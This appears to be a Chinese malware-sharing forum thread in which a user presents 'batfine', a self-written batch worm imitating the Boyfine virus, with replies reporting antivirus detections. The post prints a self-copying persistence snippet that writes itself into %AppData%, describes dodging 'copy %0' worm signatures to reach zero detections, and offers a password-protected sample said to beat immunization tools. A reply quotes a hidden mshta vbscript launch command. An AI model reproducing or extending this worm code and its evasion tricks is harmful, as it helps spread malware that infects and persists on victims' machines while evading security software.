batfine 暴风一号模仿者

python无名氏

xxs代码啊(虽说我的确是个xxs)就这么点代码就可以说是我这辈子最满意的bat作品了
这次长记性了，不乱写注释了
灵感来源：
本来打算搞个boyfine分析一下，结果分析完shift+del的时候不小心按到enter了
但好在不是管理员权限，所以explorer和smss的NTFS流没有加上(不用重装系统了)
毕竟也比较老了，有很多专杀
但咱的脑回路可跟别人不一样
我看完发作特征后做感觉能用bat复原，
正巧发现boyfine和batfine读音和字母都相似
于是就有了batfine，中文名百凤十二(好中二)
具体代码贼简单[:01:]
不用管理员权限！！！
用bat自变形、附加ntfs流还有文件夹变lnk属实有点强人所难...
代码开源，可随意改编，让他变得更好！

插曲：

for /F "delims=" %%i in ('type %0') do (echo %%i>>%temp%\temp.bat)
set fn=%random%© %temp%\temp.bat %fn%.bat
del .bat
copy %temp%\temp.bat %AppData%\Exerunner32.bat

这段代码本来可以直接换成copy %0 %AppData%\Exerunner32.bat的，但突然就用不成了，会提示：
“不能复制自身。”
以前明明还可以的，现在就这样了(啥时候更新的)
不过正好，很多杀软如果找到copy %0 的特征就会报蠕虫，现在微步报毒率成功的被我打到了0/24[:01:]

病毒样本：



解压密码：infected
这东西能破目前市面上比较流行的“先下手为强”免疫程序，可以试一试[:01:]

huangzihang

ChatGPT kill

GreatMOLA

McAfee 双击
我们发现不法分子正在劫持您的一个应用程序，不用担心，我们来处理。（没有报毒名和报毒对象）
Norton 双击

心醉咖啡

360扫描miss

117054487

管理员运行是这样的
卡巴用反锁屏杀掉的

喀反

eset 扫描miss

python无名氏

117054487 发表于 2023-3-13 19:29
管理员运行是这样的

emmm，那就算了编辑掉原来的...

761773275

BEST还是牛的

实时防护检测到恶意命令行的执行。进程 C:\Windows\System32\mshta.exe 被阻止, 由于执行了恶意命令行mshta vbscript:createobject("wscript.shell").run("""batfine.bat"" hiddenOK",0)(window.close)

761773275

anthonyqian

喀反 发表于 2023-3-13 19:33
eset 扫描miss

入库为蠕虫

The detection for this threat will be included in the next update of detection engine, expected version: 26895.

batfine.bat - BAT/Autorun.HX worm

Tomin2009

忘看启动项了